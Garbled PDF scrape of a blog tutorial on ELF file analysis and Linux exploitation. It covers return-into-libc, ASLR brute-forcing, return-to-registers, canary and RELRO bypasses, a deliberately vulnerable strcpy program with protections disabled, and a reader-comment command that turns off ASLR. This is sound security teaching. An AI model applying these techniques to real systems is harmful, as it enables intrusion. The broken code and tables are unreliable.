Академический Документы
Профессиональный Документы
Культура Документы
New systems make attackers life hard and common exploitation techniques get harder to reproduce. The purpose of this article is to be
very general on mitigation techniques and to cover attacks on x32 as a reference to x64 architectures to stick with the new constraints of
today.
Here, you will find the first step which is an ELF format file analysis. After that we will speak about the protections and ways to bypass
them. To finish, we will introduce the x86_64 that makes things more difficult for nowadays exploitations.
Pre-requisites:
1/21
22/10/2016
Exploitations
Old is always better (for attackers)
Nonexecutable stack
Address Space Layout Randomization
Brute-force
Return-to-registers
Stack Canary
RELRO
The x86_64 fact and current systems hardening
References & Acknowledgements
Where is it used?
Actually ELFs cover object files (.o), shared libraries (.so) and is also used for loadable kernel modules. As follows in listing 1, you can see
also which systems[4] have adopted the ELF format:
ELF Layout
An ELF as at least two headers: the ELF header (Elf32_Ehdr/Elf64_Ehdr struct) and the program header (Elf32_Phdr/struct Elf64_Phdr
struct)[5]. But there is also a header which is called the section header (Elf32_Shdr/struct Elf64_Shdr struct) and which describes section
like: .text, .data, .bss and so on (we will describe them later).
http://fluxius.handgrep.se/2011/10/20/the-art-of-elf-analysises-and-exploitations/#comment-18585
2/21
22/10/2016
As you can see in figure 1, there is two views. Indeed, the linking view is partitioned by sections and is used when program or library is
linked. The sections contain some object files informations like: datas, instructions, relocation informations, symbols, debugging
informations, and so on.
From the other part, the execution view, which is partitioned by segments, is used during a program execution. The program header as
shown in the left, contains informations for the kernel on how to start the program, will walk through segments and load them into
memory (mmap).
/bin/ls: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15,
Now lets focus on the ELF string. As you had probably noticed using hexdump on any ELF file (like /bin/ls for example), the file starts
with 0x7f then there are three next bytes for the encoded string ELF:
fluxiux@nyannyan:~$ hd -n 16 /bin/ls
00000000 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 |.ELF............|
The first 16 bytes represent the elf magic field, which is a way to identify an ELF file. But if bytes 1, 2 and 3 represent the encoded string
ELF, what represent bytes 4, 5, 6, 7, 8, 9?
Just have a look at elf.h source code:
http://fluxius.handgrep.se/2011/10/20/the-art-of-elf-analysises-and-exploitations/#comment-18585
3/21
22/10/2016
#define EI_CLASS
#define ELFCLASSNONE 0
/* Invalid class */
#define ELFCLASS32
/* 32-bit objects */
#define ELFCLASS64
/* 64-bit objects */
#define ELFCLASSNUM
#define EI_DATA
#define ELFDATANONE
#define ELFDATA2LSB
0
1
#define ELFDATA2MSB
We can affirmatively say, that our file is an ELF of class 64, encoded in little endian with a UNIX System V ABI standard and has 0 padding
bytes. By the way, if you did not expected yet, we have compared to the structure we have observed here the e_ident of Elf64_Ehdr
structure.
#include <stdio.h>
main()
{
printf("huhu la charrue");
}
And produce an ELF before linking it:
gcc toto.c -c
We will use now one of the most used tool as objdump to analysis ELF files which is readelf from binutils to display every fields. That will
simplify our analysis but if you are interested for dissecting ELF files yourself, you can look for libelf and we will also talk about some
interesting libraries in Python to do it much more quickly.
ELF64
Data:
Version:
OS/ABI:
ABI Version:
Type:
Machine:
1 (current)
UNIX - System V
0
REL (Relocatable file)
Advanced Micro Devices X86-64
The result seems to be very implicit, but now just lets try to identify these field using our lovely hexdump tool (in warrior forensic style!
or not):
http://fluxius.handgrep.se/2011/10/20/the-art-of-elf-analysises-and-exploitations/#comment-18585
4/21
22/10/2016
fluxiux@nyannyan:~$ hd -n 64 toto
00000000 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 |.ELF............|
00000010 01 00 3e 00 01 00 00 00 00 00 00 00 00 00 00 00 |..>.............|
00000020 00 00 00 00 00 00 00 00 38 01 00 00 00 00 00 00 |........8.......|
00000030 00 00 00 00 40 00 00 00 00 00 40 00 0d 00 0a 00 |....@.....@.....|
00000040
We already know the first line, but what can say about the three others? As you can see, in the second line, the first two bytes represent
the e_type. Indeed, if you look at elf.h file, you could observe that 01 00 in little-Indian, means: Relocatable file.
Now look at the two next bytes. We have 3e 00 that is equivalent to 62 in decimal (3*16 + c = 62), which defines the AMD x86-64
architecture:
#define EM_X86_64
62
After we have the e_version field with 01 00 as a value for Current version:
#define EV_CURRENT
#define EV_NUM
/* Current version */
Bytes 24 to 26 indicate the entry point address (which is 0x0 while it is not linked) . And we finish with two more most important think that
we will talk about in this article :
Sections
Lets just see toto.o sections with the following command:
Type
Address
Offset
EntSize
NULL
0000000000000000 00000000
0000000000000000 0000000000000000
[ 1] .text
PROGBITS
0000000000000000 00000040
0000000000000018 0000000000000000 AX
As you can see, there is a lot of sections which are part of the ELF64_Shdr:
http://fluxius.handgrep.se/2011/10/20/the-art-of-elf-analysises-and-exploitations/#comment-18585
5/21
22/10/2016
Type
Address
Offset
EntSize
NULL
0000000000000000 00000000
0000000000000000 0000000000000000
[ 1] .interp
PROGBITS
0000000000400238 00000238
000000000000001c 0000000000000000 A
In this article, we will discover some important sections to target for any attack.
Relocations
The relocation is made to modify the memory image of mapped segments to make them executable. As you saw before, there are some
.rela.* sections which are used to show where to patch the memory and how. Lets look the different relocations using our favorite tool
readelf:
http://fluxius.handgrep.se/2011/10/20/the-art-of-elf-analysises-and-exploitations/#comment-18585
6/21
22/10/2016
Info
Type
Info
Type
For more informations, you have also a description of relocation types in elf.h:
/* No reloc */
[...]
#define R_X86_64_GLOB_DAT
#define R_X86_64_JUMP_SLOT
[...]
Program Headers
The section header table is not loaded into memory, because the kernel nor the dynamic loader will be able to use that table. To load a file
into memory, program headers are used to provide informatios that are required:
Offset VirtAddr
PhysAddr
As you can see, each program header corresponds to one segment where you can find sections into it. But how does it work?
In the beginning, when the kernel sees the INTERP segment, it loads first the LOAD segments to the specified virtual addresses, then load
segments from program interpreter (/lib64/ld-linux-x86-64.so.2) and jumps to interpreters entry point. After that, the loader gets the
control and loads libraries specified in LD_PRELOAD and also DYNAMIC segments of the executable that are needed:
http://fluxius.handgrep.se/2011/10/20/the-art-of-elf-analysises-and-exploitations/#comment-18585
7/21
22/10/2016
Tag
Type
Name/Value
0x0000000000000001 (NEEDED)
After relocations, the loader invokes all libraries INIT function and then jumps to executables entry point.
In static, there is less thinks to say because the kernel only loads LOAD segments to the virtual addresses and then jumps to the entry
points (easy eh?).
For some more details (I think), you can see an old but very good article published in Linux Journal #13 about ELF dissection by Eric
Youngdale[6].
Exploitation
Old is always better (for attackers)
Once upon a the time, you where at home and waiting for the rain to stop. As always you googled for some interesting informations (of
course!) and you found a kind of bible: Smashing the stack for fun and Profit[7].
Identifying the stack address, putting your shellcode at the beginning, adding some padding and rewriting the EIP, you could see that we
can execute anything we want while exploiting a stack overflow. But times have changed, and youre now confronted to canaris, ASLR
(Address Space Layout Randomization), no executable stack, RELRO (read-only relocations), PIE support, binary-to-text encoding, and so
on.
Nonexecutable stack
To make the stack nonexecutable, we use the bit NX (No eXecute for AMD) or bit XD (eXecute Disable for Intel). In figure 2, you could see
that it matches with the most significant bit of a 64-bit Page Table Entry:
So trying to exploit a stack based overflow, you should be surprised by the fact your shellcode doesnt produce what you expected, and
thats the power of the bit NX (NX = 0 Execute, NX = 1 No eXecute).
GNU_STACK
0x0000000000000000 0x0000000000000000 RW
http://fluxius.handgrep.se/2011/10/20/the-art-of-elf-analysises-and-exploitations/#comment-18585
8
8/21
22/10/2016
As you can see, the only flags we got is the Read and Write ones. You can disable the eXecute flag using execstack -s [binaryfile] and
see the difference (RWE).
To bypass it, we can use a method called Return-into-libc. Endeed, we know that any program that includes libc will have access to its
shared functions (such as printf, exit, and so on), and we can execute system(/bin/sh) to get a shell.
First, we fill the vulnerable buffer with some junk data up to EIP (AAAAAAAAAHH! is great). After that, we have to find system()
function, but if we want to exit the program properly, the exit() will be also needed (using gdb):
(gdb) r main
Starting program: /home/fluxius/toto main
huhu la charrue
Program exited with code 017.
(gdb) p system
$1 = {<text variable, no debug info>} 0x7ffff6b8a134 <system>
(gdb) p exit
$2 = {<text variable, no debug info>} 0x7ffff6b81890 <exit>
Then, we overwrite the return address with system() functions address and follow it with the exit() functions address. To finish, we put
the address of /bin/sh (that you can retrieve from a memcmp() or an environment variable).
Inject = [junk][system()][exit()][/bin/sh]
Note: NX bit is only available in Physical Address Extension (PAE), but can be emulated by PaX or ExecShield.
Moreover, we will see after on x86_64 platforms that return-into-libc doesnt work because of the ABI specifications[8], and thats
probably a problem youve already encountered.
When performing a stack overflow for example, you could disable ASLR changing the current level to 0:
http://fluxius.handgrep.se/2011/10/20/the-art-of-elf-analysises-and-exploitations/#comment-18585
9/21
22/10/2016
the kernel 2.6.18, was used to retrieve the address of any interesting pattern \xff\xe4 (jump esp on x86) in memory. Other techniques
to bypass ASLR exist like Brute-force.
Brute-force
Thinking about exec() family functions, we can use execl to replace the current process image with a new process image. Lets make a
simple code to observe the randomization:
main()
{
char buffer[100];
printf("Buffer address: %p\n", &buffer);
}
If ASLR is enabled, you should see something like this:
fluxiux@handgrep:~/aslr$ ./buffer_addr
Buffer address: 0x7fff5e149710
fluxiux@handgrep:~/aslr$ ./buffer_addr
Buffer address: 0x7fff71f6f0b0
fluxiux@handgrep:~/aslr$ ./buffer_addr
Buffer address: 0x7fff763299c0
We see that 4 bytes change for each execution, and we have to be very lucky to point in our shellcode, if we try the brute-force way. So
we will use execl now to see any weakness when the memory layout is randomized for the process:
main()
{
int stack;
printf("Stack address: %p\n", &stack);
execl("./buffer_addr", "buffer_addr", NULL);
}
Compare the memory layouts with different runs of buffer_addr:
fluxiux@handgrep:~/aslr$ ./buffer_addr
Buffer address: 0x7fffc5cfa180
fluxiux@handgrep:~/aslr$ ./buffer_addr
Buffer address: 0x7fff1964d1f0
fluxiux@handgrep:~/aslr$ ./buffer_addr
Buffer address: 0x7fffba20bd30
fluxiux@handgrep:~/aslr$ ./buffer_addr
Buffer address: 0x7fffc8505ed0
fluxiux@handgrep:~/aslr$ ./buffer_addr
Buffer address: 0x7ffff39cbc10
fluxiux@handgrep:~/aslr$ ./buffer_addr
Buffer address: 0x7fff6eb3aa90
fluxiux@handgrep:~$ gdb -q --batch -ex "p 0x7fffc5cfa180 - 0x7fff1964d1f0"
http://fluxius.handgrep.se/2011/10/20/the-art-of-elf-analysises-and-exploitations/#comment-18585
10/21
22/10/2016
$1 = 2892681104
fluxiux@handgrep:~$ gdb -q --batch -ex "p 0x7fffc8505ed0 - 0x7fffba20bd30"
$1 = 238002592
fluxiux@handgrep:~$ gdb -q --batch -ex "p 0x7ffff39cbc10 - 0x7fff6eb3aa90"
$1 = 2229866880
And now with execl function:
fluxiux@handgrep:~/aslr$ ./weakaslr
Stack address: 0x7fff526d959c
Buffer address: 0x7fff2e95efd0
fluxiux@handgrep:~/aslr$ gdb -q --batch -ex "p 0x7fffaffcde50 - 0x7fff54800abc"
$1 = 1534907284
fluxiux@handgrep:~/aslr$ ./weakaslr
Stack address: 0x7fffed12acfc
Buffer address: 0x7fffa3a4f8f0
fluxiux@handgrep:~$ gdb -q --batch -ex "p 0x7fffdaf7d5fc - 0x7fff08361da0"
$1 = 3535911004 If we dig a little bit more, we can reduce the domain of probabilistic addresses using /proc/self/maps fil
fluxiux@handgrep:~/aslr$ ./weakaslr
Stack address: 0x7ffffbe8326c
Buffer address: 0x7fff792120c0
fluxiux@handgrep:~$ gdb -q --batch -ex "p 0x7ffffbe8326c - 0x7fff792120c0"
$1 = 2194084268
fluxiux@handgrep:~/aslr$ ./weakaslr
Stack address: 0x7fffed12acfc
Buffer address: 0x7fffa3a4f8f0
fluxiux@handgrep:~$ gdb -q --batch -ex "p 0x7fffed12acfc - 0x7fffa3a4f8f0"
$1 = 1231926284
Using this method, we could fill the buffer with return address, add a large NOP sled after the return address + the shellcode and guess
any correct offset, to point to it. As you can see, the degree of randomization is not the same, but you can play with that. Of course, this
attack is more effective on 32-bits and on older kernel versions[9].
If we dig a little bit more, we can reduce the domain of probabilistic addresses using /proc/self/maps files (local bypass), as shown
below:
...
00fa8000-00fc9000 rw-p 00000000 00:00 0
[heap]
/lib/x86_64-linux-gnu/libc-2.13.so
/lib/x86_64-linux-gnu/libc-2.13.so
/lib/x86_64-linux-gnu/libc-2.13.so
/lib/x86_64-linux-gnu/libc-2.13.so
/lib/x86_64-linux-gnu/libutil-2.13.so
/lib/x86_64-linux-gnu/libutil-2.13.so
/lib/x86_64-linux-gnu/libutil-2.13.so
http://fluxius.handgrep.se/2011/10/20/the-art-of-elf-analysises-and-exploitations/#comment-18585
11/21
22/10/2016
/lib/x86_64-linux-gnu/libutil-2.13.so
/lib/x86_64-linux-gnu/ld-2.13.so
/lib/x86_64-linux-gnu/ld-2.13.so
/lib/x86_64-linux-gnu/ld-2.13.so
[stack]
[vdso]
[vsyscall]
Unfortunately, this leak is partially patched since 2.6.27 according to Julien Tinnes and Tavis Ormandy[10], and these files seem to be
protected if you cannot ptrace a pid. Anyway, there was any other way using /proc/self/stat and /proc/self/wchan that leak
informations such as stack pointer and instruction pointer (=>ps -eo pid,eip,esp,wchan), and by sampling kstkeip, we could reconstruct
the maps (see fuzzyaslr by Tavis Ormandy[11]).
Brute-forcing is always a very offensive way to get what you want, it takes time, and you should know that every tries recorded in logs.
The solution is maybe in registers.
Return-to-registers
Using a debugger like GDB, can help you to find other ways to bypass some protections like DEP as shown previously and ASLR of course.
To study this case, we will work with a better example:
#include <stdio.h>
#include <string.h>
vuln(char* string)
{
char buffer[50];
strcpy(buffer, string); // Guys! It's vulnerable!
}
main(int argc, char** argv)
{
if (argc > 1)
vuln(argv[1]);
}
By the way, dont forget to disable the stack protector (compile as follows: gcc -fno-stack-protector -z execstack -mpreferred-stackboundary=4 vuln2.c -o vuln2). Will see after what a canary is, but now, just lets focus on ASLR for the moment.
With few tries, we see that we can rewrite the instruction pointer:
12/21
22/10/2016
0x7fffffffe148 0x7fffffffe148
http://fluxius.handgrep.se/2011/10/20/the-art-of-elf-analysises-and-exploitations/#comment-18585
13/21
22/10/2016
0x7fffffffe148 0x7fffffffe148
(gdb) stepi
0x00000000004004f8 in vuln ()
(gdb) info reg rax
rax
0x7fffffffe520 140737488348448
[...]
400604: ff d0
callq *%rax
..
At 0x400604 could be great, we just have to replace the junk data (A) by NOP sled and a precious shellcode that fits on the buffer and
we replace the instruction pointer by the address 0x400604. On 32-bits, Sickness has written a good article about that if you are
interested[12].
But as you know, by default on Linux (especially the user friendly one: Ubuntu), programs are compiled with the bit NX support, so be
lucky to use this technique on nowadays systems. Indeed, we use also an option to disable the stack protector, but what is it exactly?
Stack Canary
Named for their analogy to a canary in a coal mine, stack canary are used to protect against stack overflow attacks. Compiling with the
stack protector option (which is used by default), each dangerous function is changed in his prologue and epilogue.
If we compile the previous code letting stack protector to be used, we get something like that:
http://fluxius.handgrep.se/2011/10/20/the-art-of-elf-analysises-and-exploitations/#comment-18585
14/21
22/10/2016
0x4005a6 <vuln+66>
http://fluxius.handgrep.se/2011/10/20/the-art-of-elf-analysises-and-exploitations/#comment-18585
15/21
22/10/2016
Null (0x0),
terminator (letting the first bytes to be \a0\xff),
random.
The first 2 kinds are easy to bypass[14], because you just have to fill the buffer with your shellcode, giving a desired value to be at the
right position and rewrite the instruction pointer. But for the random one, it is a little more fun, because you have to guess its value at
each execution (Ow! A kind like ASLR?).
For random canaries, the __gard__setup() fills a global variable with random bytes generated by /dev/urandom, if possible. Latter in
the program, only 4|8 bytes are used to be the cookie. But, if we cannot use the entropy of /dev/urandom, by default we will get a
terminator or a null cookie.
Brute-force is a way, but you will use to much time. By overwriting further than the return address, we can hook the execution flow using
GOT entries. The canary will of course detect the compromising, but too late. A very good article covering the StackGuard and StackShield
explain four ways to bypass these protections[15].
However, on new kernels you also have to noticed that the random cookie is set with a null-byte at the end, and trying to recover the
value from forking or brute-forcing will not work with functions like strcpy. So the better way to do that, is to have the control of the
initialized cookie.
Format string vulnerabilities or heap overflow for example, are more easy to exploit with this protection, but this article is not finished yet
and we will see another memory corruption mitigation technique.
RELRO
In recent Linux distributions, a memory corruption mitigation technique has been introduced to harden the data sections for
binaries/processes. This protection can be viewable reading the program headers (with readelf for example):
0x00000000000001d8 0x00000000000001d8 R
On current Linux, your binaries are often compiled with RELRO. So that mean that following sections are mapped as read-only:
08
200000
[]
03
[...]
http://fluxius.handgrep.se/2011/10/20/the-art-of-elf-analysises-and-exploitations/#comment-18585
16/21
22/10/2016
The exploitation of a format string bug for example, using the format parameter %n to write to any arbitrary address like GOTs is
suppose to fail. But as we noticed previously, PLT GOTs have write permissions and then we are face to a partial-RELRO only.
With the example in trapkits article about RELRO[16], we could see that it is very easy to rewrite a PLT entry. But in some cases (mostly
in dist-packages), binaries are compiled with a full-RELRO:
The entire GOT is remapped as read-only, but there are other sections to write on. GOTs are use mostly for flexibility. Detour with .dtors
can be perform as Sebastian Krahmer described in his article about RELRO[17].
We have seen common Linux protection used by default, but the evolution of kernels and architectures have made things more difficult.
As you notices, addresses have changed and it more difficult to exploit some memory corruption because of the byte \x00, considered as
a EOF for some functions like strcpy(). We saw that NX is enabled and the compilation in gcc with its support are made by default. But
the worst is coming. Indeed, we now that the randomization space is larger but what interest us, is the System V ABI for x86_64[8].
Things have changed for parameters in functions. Indeed, instead of copying parameters in the stack, the first 6 integer and 8
float/double/vector arguments are passed in registers, rest on stack. See an example:
17/21
22/10/2016
I suggest you to read the slides Jon Larimer about Intro to x64 Reversing[18].
We could use the knowledge of borrowed code chunks article[19] that can help us to understand problems of NX, System V ABI x86_64
differences with x32, and ways to bypass them using instructions to write a value on one register, and call the function system(), for
example, that will use this register as a parameter.
Other sophisticated attacks like Return-oriented Programing are use to bypass these protection that make life difficult in an exploit
process.
As you could see, protections didnt make things impossible, but just harder and harder. So be aware of new applied protections and
conventions to not waste too much time.
http://fluxius.handgrep.se/2011/10/20/the-art-of-elf-analysises-and-exploitations/#comment-18585
18/21
22/10/2016
http://www.x86-64.org/documentation/abi.pdf
[9] Hacking The art of exploitation (by Jon
Erickson)
[10] Local bypass of Linux ASLR through /proc
information leaks
http://blog.cr0.org/2009/04/local-bypass-of-linux-aslr-through-proc.html
[11] Fuzzy ASLR http://code.google.com/p/fuzzyaslr/
[12] ASLR bypass using ret2reg
http://www.exploit-db.com/download_pdf/17049
[13] /dev/urandom
http://en.wikipedia.org/wiki//dev/urandom
[14] Stack Smashing Protector (FreeBSD)
http://www.hackitoergosum.org/2010/HES2010-prascagneres-Stack-Smashing-Protector-in-FreeBSD.pdf
[15] Four different tricks to bypass StackShield and
StackGuard protection
http://www.coresecurity.com/files/attachments/StackguardPaper.pdf
http://tk-blog.blogspot.com/2009/02/relro-not-so-well-known-memory.http://tk-blog.blogspot.com/2009/02/relro-not-so-well-knownmemory.htmlhtml
[17] RELRO by Sebastian Krahmer
http://www.suse.de/%7Ekrahmer/relro.txt
[18] Intro to x64 reversing
http://lolcathost.org/b/introx86.pdf
[19] x86-64 buffer overflow exploits and the borrowed
code chunks http://www.suse.de/~krahmer/no-nx.pdf
It just miss one little trick to workaround ASLR that I noticed under Linux. So, this is Linux specific and wont work on any other POSIX system.
Basically, it plays with processes personality flags to mark a process to be out of ASLR. The good thing is that it do not require to be system
administrator to trigger it on and off. The bad thing being that it will break if you try to apply it to setuid programs (this is for obvious security
reasons).
So, the idea is that every process under Linux has personality flags that are inherited by all its childs. And one of these flag is about having the
ASLR activated or not. Triggering these flags is done through the command setarch (read man setarch to know more about it).
So, if you execute the following command, you will start a fresh shell environment where ASLR will be totally deactivated: setarch `uname -m`
addr-no-randomize /bin/bash
I tell this trick to my students to practice and try out things on systems where they do not have root access.
http://fluxius.handgrep.se/2011/10/20/the-art-of-elf-analysises-and-exploitations/#comment-18585
19/21
22/10/2016
Ill put this trick in the article anyway. Its interested to give people the possibility to disable the ASLR being a simple user =)
Thank you!
Reply
Pingback:
http://fluxius.handgrep.se/2011/10/20/the-art-of-elf-analysises-and-exploitations/#comment-18585
20/21
22/10/2016
http://fluxius.handgrep.se/2011/10/20/the-art-of-elf-analysises-and-exploitations/#comment-18585
21/21